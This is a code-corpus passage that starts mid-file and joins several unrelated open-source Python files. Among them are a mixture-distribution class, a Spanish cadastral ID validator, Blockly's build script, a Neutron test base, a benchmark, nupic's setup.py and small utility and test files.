i = int(self._mixing_dist.sample())
return self._distributions[i].sample()
else:
indices = self._mixing_dist.sample()
dist_samples = []
for d in self._distributions:
sample = d.sample()
if sample.dim() == 0:
sample = sample.unsqueeze(-1)
dist_samples.append(sample)
ret = []
for b in range(self._batch_length):
i = int(indices[b])
ret.append(dist_samples[i][b])
return util.to_tensor(ret)
@property
def mean(self):
if self._mean is None:
means = torch.stack([d.mean for d in self._distributions])
if self._batch_length == 0:
self._mean = torch.dot(self._probs, means)
else:
self._mean = torch.diag(torch.mm(self._probs, means))
return self._mean
@property
def variance(self):
if self._variance is None:
variances = torch.stack([(d.mean - self.mean).pow(2) + d.variance for d in self._distributions])
if self._batch_length == 0:
self._variance = torch.dot(self._probs, variances)
else:
self._variance = torch.diag(torch.mm(self._probs, variances))
return self._variance
| probprog/pyprob | pyprob/distributions/mixture.py | Python | bsd-2-clause | 3,418 | 0.002048 |
# referenciacatastral.py - functions for handling Spanish real state ids
# coding: utf-8
#
# Copyright (C) 2016 David García Garzón
# Copyright (C) 2016-2017 Arthur de Jong
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301 USA
"""Referencia Catastral (Spanish real estate property id)
The cadastral reference code is an identifier for real estate in Spain. It is
issued by Dirección General del Catastro (General Directorate of Land
Registry) of the Ministerio de Hacienda (Tresury Ministry).
It has 20 digits and contains numbers and letters including the Spanish Ñ.
The number consists of 14 digits for the parcel, 4 for identifying properties
within the parcel and 2 check digits. The parcel digits are structured
differently for urban, non-urban or special (infrastructure) cases.
More information:
* http://www.catastro.meh.es/esp/referencia_catastral_1.asp (Spanish)
* http://www.catastro.meh.es/documentos/05042010_P.pdf (Spanish)
* https://es.wikipedia.org/wiki/Catastro#Referencia_catastral
>>> validate('7837301-VG8173B-0001 TT') # Lanteira town hall
'7837301VG8173B0001TT'
>>> validate('783301 VG8173B 0001 TT') # missing digit
Traceback (most recent call last):
...
InvalidLength: ...
>>> validate('7837301/VG8173B 0001 TT') # not alphanumeric
Traceback (most recent call last):
...
InvalidFormat: ...
>>> validate('7837301 VG8173B 0001 NN') # bad check digits
Traceback (most recent call last):
...
InvalidChecksum: ...
>>> format('4A08169P03PRAT0001LR') # BCN Airport
'4A08169 P03PRAT 0001 LR'
"""
from stdnum.exceptions import *
from stdnum.util import clean
alphabet = u'ABCDEFGHIJKLMNÑOPQRSTUVWXYZ0123456789'
def compact(number):
"""Convert the number to the minimal representation. This strips the
number of any valid separators and removes surrounding whitespace."""
return clean(number, ' -').strip().upper()
def format(number):
"""Reformat the passed number to the standard format."""
number = compact(number)
return ' '.join([
number[:7],
number[7:14],
number[14:18],
number[18:]
])
# The check digit implementation is based on the Javascript
# implementation by Vicente Sancho that can be found at
# http://trellat.es/validar-la-referencia-catastral-en-javascript/
def _check_digit(number):
"""Calculate a single check digit on the provided part of the number."""
weights = (13, 15, 12, 5, 4, 17, 9, 21, 3, 7, 1)
s = sum(w * (int(n) if n.isdigit() else alphabet.find(n) + 1)
for w, n in zip(weights, number))
return 'MQWERTYUIOPASDFGHJKLBZX'[s % 23]
def _force_unicode(number):
"""Convert the number to unicode."""
if not hasattr(number, 'isnumeric'): # pragma: no cover (Python 2 code)
number = number.decode('utf-8')
return number
def calc_check_digits(number):
"""Calculate the check digits for the number."""
number = _force_unicode(compact(number))
return (
_check_digit(number[0:7] + number[14:18]) +
_check_digit(number[7:14] + number[14:18]))
def validate(number):
"""Checks to see if the number provided is a valid Cadastral Reference.
This checks the length, formatting and check digits."""
number = compact(number)
n = _force_unicode(number)
if not all(c in alphabet for c in n):
raise InvalidFormat()
if len(n) != 20:
raise InvalidLength()
if calc_check_digits(n) != n[18:]:
raise InvalidChecksum()
return number
def is_valid(number):
"""Checks to see if the number provided is a valid Cadastral Reference."""
try:
return bool(validate(number))
except ValidationError:
return False
| holvi/python-stdnum | stdnum/es/referenciacatastral.py | Python | lgpl-2.1 | 4,360 | 0 |
#!/usr/bin/python2.7
# Compresses the core Blockly files into a single JavaScript file.
#
# Copyright 2012 Google Inc.
# https://developers.google.com/blockly/
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This script generates two versions of Blockly's core files:
# blockly_compressed.js
# blockly_uncompressed.js
# The compressed file is a concatenation of all of Blockly's core files which
# have been run through Google's Closure Compiler. This is done using the
# online API (which takes a few seconds and requires an Internet connection).
# The uncompressed file is a script that loads in each of Blockly's core files
# one by one. This takes much longer for a browser to load, but is useful
# when debugging code since line numbers are meaningful and variables haven't
# been renamed. The uncompressed file also allows for a faster developement
# cycle since there is no need to rebuild or recompile, just reload.
#
# This script also generates:
# blocks_compressed.js: The compressed common blocks.
# blocks_horizontal_compressed.js: The compressed Scratch horizontal blocks.
# blocks_vertical_compressed.js: The compressed Scratch vertical blocks.
# msg/js/<LANG>.js for every language <LANG> defined in msg/js/<LANG>.json.
import sys
if sys.version_info[0] != 2:
raise Exception("Blockly build only compatible with Python 2.x.\n"
"You are using: " + sys.version)
import errno, glob, httplib, json, os, re, subprocess, threading, urllib
def import_path(fullpath):
"""Import a file with full path specification.
Allows one to import from any directory, something __import__ does not do.
Args:
fullpath: Path and filename of import.
Returns:
An imported module.
"""
path, filename = os.path.split(fullpath)
filename, ext = os.path.splitext(filename)
sys.path.append(path)
module = __import__(filename)
reload(module) # Might be out of date.
del sys.path[-1]
return module
HEADER = ("// Do not edit this file; automatically generated by build.py.\n"
"'use strict';\n")
class Gen_uncompressed(threading.Thread):
"""Generate a JavaScript file that loads Blockly's raw files.
Runs in a separate thread.
"""
def __init__(self, search_paths, vertical):
threading.Thread.__init__(self)
self.search_paths = search_paths
self.vertical = vertical
def run(self):
if self.vertical:
target_filename = 'blockly_uncompressed_vertical.js'
else:
target_filename = 'blockly_uncompressed_horizontal.js'
f = open(target_filename, 'w')
f.write(HEADER)
f.write("""
var isNodeJS = !!(typeof module !== 'undefined' && module.exports &&
typeof window === 'undefined');
if (isNodeJS) {
var window = {};
require('../closure-library/closure/goog/bootstrap/nodejs');
}
window.BLOCKLY_DIR = (function() {
if (!isNodeJS) {
// Find name of current directory.
var scripts = document.getElementsByTagName('script');
var re = new RegExp('(.+)[\/]blockly_uncompressed(_vertical|_horizontal|)\.js$');
for (var i = 0, script; script = scripts[i]; i++) {
var match = re.exec(script.src);
if (match) {
return match[1];
}
}
alert('Could not detect Blockly\\'s directory name.');
}
return '';
})();
window.BLOCKLY_BOOT = function() {
var dir = '';
if (isNodeJS) {
require('../closure-library/closure/goog/bootstrap/nodejs');
dir = 'blockly';
} else {
// Execute after Closure has loaded.
if (!window.goog) {
alert('Error: Closure not found. Read this:\\n' +
'developers.google.com/blockly/guides/modify/web/closure');
}
dir = window.BLOCKLY_DIR.match(/[^\\/]+$/)[0];
}
""")
add_dependency = []
base_path = calcdeps.FindClosureBasePath(self.search_paths)
for dep in calcdeps.BuildDependenciesFromFiles(self.search_paths):
add_dependency.append(calcdeps.GetDepsLine(dep, base_path))
add_dependency = '\n'.join(add_dependency)
# Find the Blockly directory name and replace it with a JS variable.
# This allows blockly_uncompressed.js to be compiled on one computer and be
# used on another, even if the directory name differs.
m = re.search('[\\/]([^\\/]+)[\\/]core[\\/]blockly.js', add_dependency)
add_dependency = re.sub('([\\/])' + re.escape(m.group(1)) +
'([\\/]core[\\/])', '\\1" + dir + "\\2', add_dependency)
f.write(add_dependency + '\n')
provides = []
for dep in calcdeps.BuildDependenciesFromFiles(self.search_paths):
if not dep.filename.startswith(os.pardir + os.sep): # '../'
provides.extend(dep.provides)
provides.sort()
f.write('\n')
f.write('// Load Blockly.\n')
for provide in provides:
f.write("goog.require('%s');\n" % provide)
f.write("""
delete this.BLOCKLY_DIR;
delete this.BLOCKLY_BOOT;
};
if (isNodeJS) {
window.BLOCKLY_BOOT()
module.exports = Blockly;
} else {
// Delete any existing Closure (e.g. Soy's nogoog_shim).
document.write('<script>var goog = undefined;</script>');
// Load fresh Closure Library.
document.write('<script src="' + window.BLOCKLY_DIR +
'/../closure-library/closure/goog/base.js"></script>');
document.write('<script>window.BLOCKLY_BOOT();</script>');
}
""")
f.close()
print("SUCCESS: " + target_filename)
class Gen_compressed(threading.Thread):
"""Generate a JavaScript file that contains all of Blockly's core and all
required parts of Closure, compiled together.
Uses the Closure Compiler's online API.
Runs in a separate thread.
"""
def __init__(self, search_paths_vertical, search_paths_horizontal):
threading.Thread.__init__(self)
self.search_paths_vertical = search_paths_vertical
self.search_paths_horizontal = search_paths_horizontal
def run(self):
self.gen_core(True)
self.gen_core(False)
self.gen_blocks("horizontal")
self.gen_blocks("vertical")
self.gen_blocks("common")
self.gen_generator("arduino")
def gen_core(self, vertical):
if vertical:
target_filename = 'blockly_compressed_vertical.js'
search_paths = self.search_paths_vertical
else:
target_filename = 'blockly_compressed_horizontal.js'
search_paths = self.search_paths_horizontal
# Define the parameters for the POST request.
params = [
("compilation_level", "SIMPLE_OPTIMIZATIONS"),
("use_closure_library", "true"),
("output_format", "json"),
("output_info", "compiled_code"),
("output_info", "warnings"),
("output_info", "errors"),
("output_info", "statistics"),
]
# Read in all the source files.
filenames = calcdeps.CalculateDependencies(search_paths,
[os.path.join("core", "blockly.js")])
for filename in filenames:
# Filter out the Closure files (the compiler will add them).
if filename.startswith(os.pardir + os.sep): # '../'
continue
f = open(filename)
params.append(("js_code", "".join(f.readlines())))
f.close()
self.do_compile(params, target_filename, filenames, "")
def gen_blocks(self, block_type):
if block_type == "horizontal":
target_filename = "blocks_compressed_horizontal.js"
filenames = glob.glob(os.path.join("blocks_horizontal", "*.js"))
elif block_type == "vertical":
target_filename = "blocks_compressed_vertical.js"
filenames = glob.glob(os.path.join("blocks_vertical", "*.js"))
elif block_type == "common":
target_filename = "blocks_compressed.js"
filenames = glob.glob(os.path.join("blocks_common", "*.js"))
# Define the parameters for the POST request.
params = [
("compilation_level", "SIMPLE_OPTIMIZATIONS"),
("output_format", "json"),
("output_info", "compiled_code"),
("output_info", "warnings"),
("output_info", "errors"),
("output_info", "statistics"),
]
# Read in all the source files.
# Add Blockly.Blocks to be compatible with the compiler.
params.append(("js_code", "goog.provide('Blockly.Blocks');"))
# Add Blockly.Colours for use of centralized colour bank
filenames.append(os.path.join("core", "colours.js"))
filenames.append(os.path.join("core", "constants.js"))
for filename in filenames:
f = open(filename)
params.append(("js_code", "".join(f.readlines())))
f.close()
# Remove Blockly.Blocks to be compatible with Blockly.
remove = "var Blockly={Blocks:{}};"
self.do_compile(params, target_filename, filenames, remove)
def gen_generator(self, language):
target_filename = language + "_compressed.js"
# Define the parameters for the POST request.
params = [
("compilation_level", "SIMPLE_OPTIMIZATIONS"),
("output_format", "json"),
("output_info", "compiled_code"),
("output_info", "warnings"),
("output_info", "errors"),
("output_info", "statistics"),
]
# Read in all the source files.
# Add Blockly.Generator to be compatible with the compiler.
params.append(("js_code", "goog.provide('Blockly.Generator');"))
filenames = glob.glob(
os.path.join("generators", language, "*.js"))
filenames.insert(0, os.path.join("generators", language + ".js"))
for filename in filenames:
f = open(filename)
params.append(("js_code", "".join(f.readlines())))
f.close()
filenames.insert(0, "[goog.provide]")
# Remove Blockly.Generator to be compatible with Blockly.
remove = "var Blockly={Generator:{}};"
self.do_compile(params, target_filename, filenames, remove)
def do_compile(self, params, target_filename, filenames, remove):
# Send the request to Google.
headers = {"Content-type": "application/x-www-form-urlencoded"}
conn = httplib.HTTPConnection("closure-compiler.appspot.com")
conn.request("POST", "/compile", urllib.urlencode(params), headers)
response = conn.getresponse()
json_str = response.read()
conn.close()
# Parse the JSON response.
json_data = json.loads(json_str)
def file_lookup(name):
if not name.startswith("Input_"):
return "???"
n = int(name[6:]) - 1
return filenames[n]
if json_data.has_key("serverErrors"):
errors = json_data["serverErrors"]
for error in errors:
print("SERVER ERROR: %s" % target_filename)
print(error["error"])
elif json_data.has_key("errors"):
errors = json_data["errors"]
for error in errors:
print("FATAL ERROR")
print(error["error"])
if error["file"]:
print("%s at line %d:" % (
file_lookup(error["file"]), error["lineno"]))
print(error["line"])
print((" " * error["charno"]) + "^")
sys.exit(1)
else:
if json_data.has_key("warnings"):
warnings = json_data["warnings"]
for warning in warnings:
print("WARNING")
print(warning["warning"])
if warning["file"]:
print("%s at line %d:" % (
file_lookup(warning["file"]), warning["lineno"]))
print(warning["line"])
print((" " * warning["charno"]) + "^")
print()
if not json_data.has_key("compiledCode"):
print("FATAL ERROR: Compiler did not return compiledCode.")
sys.exit(1)
code = HEADER + "\n" + json_data["compiledCode"]
code = code.replace(remove, "")
# Trim down Google's Apache licences.
# The Closure Compiler used to preserve these until August 2015.
# Delete this in a few months if the licences don't return.
LICENSE = re.compile("""/\\*
[\w ]+
(Copyright \\d+ Google Inc.)
https://developers.google.com/blockly/
Licensed under the Apache License, Version 2.0 \(the "License"\);
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
\\*/""")
code = re.sub(LICENSE, r"\n// \1 Apache License 2.0", code)
stats = json_data["statistics"]
original_b = stats["originalSize"]
compressed_b = stats["compressedSize"]
if original_b > 0 and compressed_b > 0:
f = open(target_filename, "w")
f.write(code)
f.close()
original_kb = int(original_b / 1024 + 0.5)
compressed_kb = int(compressed_b / 1024 + 0.5)
ratio = int(float(compressed_b) / float(original_b) * 100 + 0.5)
print("SUCCESS: " + target_filename)
print("Size changed from %d KB to %d KB (%d%%)." % (
original_kb, compressed_kb, ratio))
else:
print("UNKNOWN ERROR")
class Gen_langfiles(threading.Thread):
"""Generate JavaScript file for each natural language supported.
Runs in a separate thread.
"""
def __init__(self):
threading.Thread.__init__(self)
def _rebuild(self, srcs, dests):
# Determine whether any of the files in srcs is newer than any in dests.
try:
return (max(os.path.getmtime(src) for src in srcs) >
min(os.path.getmtime(dest) for dest in dests))
except OSError as e:
# Was a file not found?
if e.errno == errno.ENOENT:
# If it was a source file, we can't proceed.
if e.filename in srcs:
print("Source file missing: " + e.filename)
sys.exit(1)
else:
# If a destination file was missing, rebuild.
return True
else:
print("Error checking file creation times: " + e)
def run(self):
# The files msg/json/{en,qqq,synonyms}.json depend on msg/messages.js.
if self._rebuild([os.path.join("msg", "messages.js")],
[os.path.join("msg", "json", f) for f in
["en.json", "qqq.json", "synonyms.json"]]):
try:
subprocess.check_call([
"python",
os.path.join("i18n", "js_to_json.py"),
"--input_file", "msg/messages.js",
"--output_dir", "msg/json/",
"--quiet"])
except (subprocess.CalledProcessError, OSError) as e:
# Documentation for subprocess.check_call says that CalledProcessError
# will be raised on failure, but I found that OSError is also possible.
print("Error running i18n/js_to_json.py: ", e)
sys.exit(1)
# Checking whether it is necessary to rebuild the js files would be a lot of
# work since we would have to compare each <lang>.json file with each
# <lang>.js file. Rebuilding is easy and cheap, so just go ahead and do it.
try:
# Use create_messages.py to create .js files from .json files.
cmd = [
"python",
os.path.join("i18n", "create_messages.py"),
"--source_lang_file", os.path.join("msg", "json", "en.json"),
"--source_synonym_file", os.path.join("msg", "json", "synonyms.json"),
"--key_file", os.path.join("msg", "json", "keys.json"),
"--output_dir", os.path.join("msg", "js"),
"--quiet"]
json_files = glob.glob(os.path.join("msg", "json", "*.json"))
json_files = [file for file in json_files if not
(file.endswith(("keys.json", "synonyms.json", "qqq.json")))]
cmd.extend(json_files)
subprocess.check_call(cmd)
except (subprocess.CalledProcessError, OSError) as e:
print("Error running i18n/create_messages.py: ", e)
sys.exit(1)
# Output list of .js files created.
for f in json_files:
# This assumes the path to the current directory does not contain "json".
f = f.replace("json", "js")
if os.path.isfile(f):
print("SUCCESS: " + f)
else:
print("FAILED to create " + f)
def exclude_vertical(item):
return not item.endswith("block_render_svg_vertical.js")
def exclude_horizontal(item):
return not item.endswith("block_render_svg_horizontal.js")
if __name__ == "__main__":
try:
calcdeps = import_path(os.path.join(
os.path.pardir, "closure-library", "closure", "bin", "calcdeps.py"))
except ImportError:
if os.path.isdir(os.path.join(os.path.pardir, "closure-library-read-only")):
# Dir got renamed when Closure moved from Google Code to GitHub in 2014.
print("Error: Closure directory needs to be renamed from"
"'closure-library-read-only' to 'closure-library'.\n"
"Please rename this directory.")
elif os.path.isdir(os.path.join(os.path.pardir, "google-closure-library")):
# When Closure is installed by npm, it is named "google-closure-library".
#calcdeps = import_path(os.path.join(
# os.path.pardir, "google-closure-library", "closure", "bin", "calcdeps.py"))
print("Error: Closure directory needs to be renamed from"
"'google-closure-library' to 'closure-library'.\n"
"Please rename this directory.")
else:
print("""Error: Closure not found. Read this:
developers.google.com/blockly/guides/modify/web/closure""")
sys.exit(1)
search_paths = calcdeps.ExpandDirectories(
["core", os.path.join(os.path.pardir, "closure-library")])
search_paths_horizontal = filter(exclude_vertical, search_paths)
search_paths_vertical = filter(exclude_horizontal, search_paths)
# Run all tasks in parallel threads.
# Uncompressed is limited by processor speed.
# Compressed is limited by network and server speed.
# Vertical:
Gen_uncompressed(search_paths_vertical, True).start()
# Horizontal:
Gen_uncompressed(search_paths_horizontal, False).start()
# Compressed forms of vertical and horizontal.
Gen_compressed(search_paths_vertical, search_paths_horizontal).start()
# This is run locally in a separate thread.
Gen_langfiles().start()
| kesl-scratch/PopconBot | scratch-blocks/build.py | Python | mit | 18,550 | 0.007978 |
import hashlib
def handle_uploaded_file(f):
img_url = 'media/image/' + CalcMD5(f) + f._name
with open(img_url, 'wb+') as destination:
for chunk in f.chunks():
destination.write(chunk)
return ('/' + img_url, f._name)
def CalcMD5(f):
md5obj = hashlib.md5()
md5obj.update(f.read())
hash = md5obj.hexdigest()
return hash | unixhot/opencmdb | util/util.py | Python | apache-2.0 | 366 | 0.008197 |
# -*- coding: utf-8 -*-
# from pytest import raises
# The parametrize function is generated, so this doesn't work:
#
# from pytest.mark import parametrize
#
import pytest
parametrize = pytest.mark.parametrize
# from duckomatic import metadata
# TODO: Importing this is broken because six.moves.urllib gives
# an import error.
# from duckomatic.__main__ import main
class TestMain(object):
def test_fake(self):
pass
# @parametrize('helparg', ['-h', '--help'])
# def test_help(self, helparg, capsys):
# with raises(SystemExit) as exc_info:
# main(['progname', helparg])
# out, err = capsys.readouterr()
# # Should have printed some sort of usage message. We don't
# # need to explicitly test the content of the message.
# assert 'usage' in out
# # Should have used the program name from the argument
# # vector.
# assert 'progname' in out
# # Should exit with zero return code.
# assert exc_info.value.code == 0
# @parametrize('versionarg', ['-V', '--version'])
# def test_version(self, versionarg, capsys):
# with raises(SystemExit) as exc_info:
# main(['progname', versionarg])
# out, err = capsys.readouterr()
# # Should print out version.
# assert err == '{0} {1}\n'.format(metadata.project, metadata.version)
# # Should exit with zero return code.
# assert exc_info.value.code == 0
| morgangalpin/duckomatic | tests/test_main.py | Python | gpl-3.0 | 1,476 | 0 |
# Copyright 2014 Cisco Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import random
from neutron.agent.linux import ovs_lib
from neutron.agent.linux import utils
from neutron.common import constants as n_const
from neutron.tests import base
BR_PREFIX = 'test-br'
class BaseLinuxTestCase(base.BaseTestCase):
def setUp(self, root_helper='sudo'):
super(BaseLinuxTestCase, self).setUp()
self.root_helper = root_helper
def check_command(self, cmd, error_text, skip_msg):
try:
utils.execute(cmd)
except RuntimeError as e:
if error_text in str(e):
self.skipTest(skip_msg)
raise
def check_sudo_enabled(self):
if os.environ.get('OS_SUDO_TESTING') not in base.TRUE_STRING:
self.skipTest('testing with sudo is not enabled')
def get_rand_name(self, max_length, prefix='test'):
name = prefix + str(random.randint(1, 0x7fffffff))
return name[:max_length]
def create_resource(self, name_prefix, creation_func, *args, **kwargs):
"""Create a new resource that does not already exist.
:param name_prefix: The prefix for a randomly generated name
:param creation_func: A function taking the name of the resource
to be created as it's first argument. An error is assumed
to indicate a name collision.
:param *args *kwargs: These will be passed to the create function.
"""
while True:
name = self.get_rand_name(n_const.DEV_NAME_MAX_LEN, name_prefix)
try:
return creation_func(name, *args, **kwargs)
except RuntimeError:
continue
class BaseOVSLinuxTestCase(BaseLinuxTestCase):
def setUp(self, root_helper='sudo'):
super(BaseOVSLinuxTestCase, self).setUp(root_helper)
self.ovs = ovs_lib.BaseOVS(self.root_helper)
def create_ovs_bridge(self, br_prefix=BR_PREFIX):
br = self.create_resource(br_prefix, self.ovs.add_bridge)
self.addCleanup(br.destroy)
return br
| onecloud/neutron | neutron/tests/functional/agent/linux/base.py | Python | apache-2.0 | 2,637 | 0 |
#!/usr/bin/env python
#
# @license Apache-2.0
#
# Copyright (c) 2018 The Stdlib Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Benchmark cexp."""
from __future__ import print_function
import timeit
NAME = "cexp"
REPEATS = 3
ITERATIONS = 1000000
def print_version():
"""Print the TAP version."""
print("TAP version 13")
def print_summary(total, passing):
"""Print the benchmark summary.
# Arguments
* `total`: total number of tests
* `passing`: number of passing tests
"""
print("#")
print("1.." + str(total)) # TAP plan
print("# total " + str(total))
print("# pass " + str(passing))
print("#")
print("# ok")
def print_results(elapsed):
"""Print benchmark results.
# Arguments
* `elapsed`: elapsed time (in seconds)
# Examples
``` python
python> print_results(0.131009101868)
```
"""
rate = ITERATIONS / elapsed
print(" ---")
print(" iterations: " + str(ITERATIONS))
print(" elapsed: " + str(elapsed))
print(" rate: " + str(rate))
print(" ...")
def benchmark():
"""Run the benchmark and print benchmark results."""
setup = "from random import random; from cmath import exp;"
stmt = "re = (random()*100.0) - 50.0; im = (random()*100.0) - 50.0; y = exp(re + 1.0j * im);"
t = timeit.Timer(stmt, setup=setup)
print_version()
for i in range(REPEATS):
print("# python::" + NAME)
elapsed = t.timeit(number=ITERATIONS)
print_results(elapsed)
print("ok " + str(i+1) + " benchmark finished")
print_summary(REPEATS, REPEATS)
def main():
"""Run the benchmark."""
benchmark()
if __name__ == "__main__":
main()
| stdlib-js/stdlib | lib/node_modules/@stdlib/math/base/special/cexp/benchmark/python/benchmark.py | Python | apache-2.0 | 2,220 | 0.00045 |
#!/usr/bin/env python
"""This does HTTP GET requests given a host:port and path and returns
a subset of the headers plus the body of the result."""
from __future__ import absolute_import, print_function
import json
import os
import sys
from edenscm.mercurial import util
httplib = util.httplib
try:
import msvcrt
msvcrt.setmode(sys.stdout.fileno(), os.O_BINARY)
msvcrt.setmode(sys.stderr.fileno(), os.O_BINARY)
except ImportError:
pass
twice = False
if "--twice" in sys.argv:
sys.argv.remove("--twice")
twice = True
headeronly = False
if "--headeronly" in sys.argv:
sys.argv.remove("--headeronly")
headeronly = True
formatjson = False
if "--json" in sys.argv:
sys.argv.remove("--json")
formatjson = True
hgproto = None
if "--hgproto" in sys.argv:
idx = sys.argv.index("--hgproto")
hgproto = sys.argv[idx + 1]
sys.argv.pop(idx)
sys.argv.pop(idx)
tag = None
def request(host, path, show):
assert not path.startswith("/"), path
global tag
headers = {}
if tag:
headers["If-None-Match"] = tag
if hgproto:
headers["X-HgProto-1"] = hgproto
conn = httplib.HTTPConnection(host)
conn.request("GET", "/" + path, None, headers)
response = conn.getresponse()
print(response.status, response.reason)
if show[:1] == ["-"]:
show = sorted(h for h, v in response.getheaders() if h.lower() not in show)
for h in [h.lower() for h in show]:
if response.getheader(h, None) is not None:
print("%s: %s" % (h, response.getheader(h)))
if not headeronly:
print()
data = response.read()
# Pretty print JSON. This also has the beneficial side-effect
# of verifying emitted JSON is well-formed.
if formatjson:
# json.dumps() will print trailing newlines. Eliminate them
# to make tests easier to write.
data = json.loads(data)
lines = json.dumps(data, sort_keys=True, indent=2).splitlines()
for line in lines:
print(line.rstrip())
else:
sys.stdout.write(data)
if twice and response.getheader("ETag", None):
tag = response.getheader("ETag")
return response.status
status = request(sys.argv[1], sys.argv[2], sys.argv[3:])
if twice:
status = request(sys.argv[1], sys.argv[2], sys.argv[3:])
if 200 <= status <= 305:
sys.exit(0)
sys.exit(1)
| facebookexperimental/eden | eden/hg-server/tests/get-with-headers.py | Python | gpl-2.0 | 2,434 | 0.000411 |
# ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2015, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
"""Installation script for Python nupic package."""
import os
import setuptools
import sys
from setuptools import setup, find_packages, Extension
REPO_DIR = os.path.dirname(os.path.realpath(__file__))
def getVersion():
"""
Get version from local file.
"""
with open(os.path.join(REPO_DIR, "VERSION"), "r") as versionFile:
return versionFile.read().strip()
def parse_file(requirementFile):
try:
return [
line.strip()
for line in open(requirementFile).readlines()
if not line.startswith("#")
]
except IOError:
return []
def findRequirements():
"""
Read the requirements.txt file and parse into requirements for setup's
install_requirements option.
"""
requirementsPath = os.path.join(REPO_DIR, "external", "common",
"requirements.txt")
requirements = parse_file(requirementsPath)
return requirements
if __name__ == "__main__":
requirements = findRequirements()
setup(
name="nupic",
version=getVersion(),
install_requires=requirements,
package_dir = {"": "src"},
packages=find_packages("src"),
namespace_packages = ["nupic"],
package_data={
"nupic.support": ["nupic-default.xml",
"nupic-logging.conf"],
"nupic": ["README.md", "LICENSE.txt"],
"nupic.data": ["*.json"],
"nupic.frameworks.opf.exp_generator": ["*.json", "*.tpl"],
"nupic.frameworks.opf.jsonschema": ["*.json"],
"nupic.swarming.exp_generator": ["*.json", "*.tpl"],
"nupic.swarming.jsonschema": ["*.json"],
"nupic.datafiles": ["*.csv", "*.txt"],
},
include_package_data=True,
zip_safe=False,
description="Numenta Platform for Intelligent Computing",
author="Numenta",
author_email="[email protected]",
url="https://github.com/numenta/nupic",
classifiers=[
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"License :: OSI Approved :: GNU Affero General Public License v3 or later (AGPLv3+)",
"Operating System :: MacOS :: MacOS X",
"Operating System :: POSIX :: Linux",
# It has to be "5 - Production/Stable" or else pypi rejects it!
"Development Status :: 5 - Production/Stable",
"Environment :: Console",
"Intended Audience :: Science/Research",
"Topic :: Scientific/Engineering :: Artificial Intelligence"
],
long_description=(
"Numenta Platform for Intelligent Computing: a machine intelligence "
"platform that implements the HTM learning algorithms. HTM is a "
"detailed computational theory of the neocortex. At the core of HTM "
"are time-based continuous learning algorithms that store and recall "
"spatial and temporal patterns. NuPIC is suited to a variety of "
"problems, particularly anomaly detection and prediction of streaming "
"data sources.\n\n"
"For more information, see http://numenta.org or the NuPIC wiki at "
"https://github.com/numenta/nupic/wiki.")
)
| mcanthony/nupic | setup.py | Python | agpl-3.0 | 4,025 | 0.00472 |
"""Index interaction code
"""
| RalfBarkow/Zettelkasten | venv/lib/python3.9/site-packages/pip/_internal/index/__init__.py | Python | gpl-3.0 | 30 | 0 |
from typing import List, TypeVar
C = TypeVar('C') # how to constrain to only the closure below?
def color_factory(color_code: str) -> C:
def apply(text: str, format_spec: str = '') -> str:
return color_code + format(text, format_spec) + '\033[0m'
def mix(*colors: C) -> List[C]:
return [color_factory(c.color_code + color_code) for c in colors]
apply.mix, apply.color_code = mix, color_code
return apply
class Colors:
BLUE = color_factory('\033[94m')
GREEN = color_factory('\033[92m')
YELLOW = color_factory('\033[93m')
RED = color_factory('\033[91m')
MAGENTA = color_factory('\033[95m')
CYAN = color_factory('\033[96m')
ORANGE = color_factory('\033[38;5;208m')
BOLD = color_factory('\033[1m')
DIM = color_factory('\033[2m')
BLUE_BOLD, BLUE_DIM = BLUE.mix(BOLD, DIM)
GREEN_BOLD, GREEN_DIM = GREEN.mix(BOLD, DIM)
YELLOW_BOLD, YELLOW_DIM = YELLOW.mix(BOLD, DIM)
RED_BOLD, RED_DIM = RED.mix(BOLD, DIM)
MAGENTA_BOLD, MAGENTA_DIM = MAGENTA.mix(BOLD, DIM)
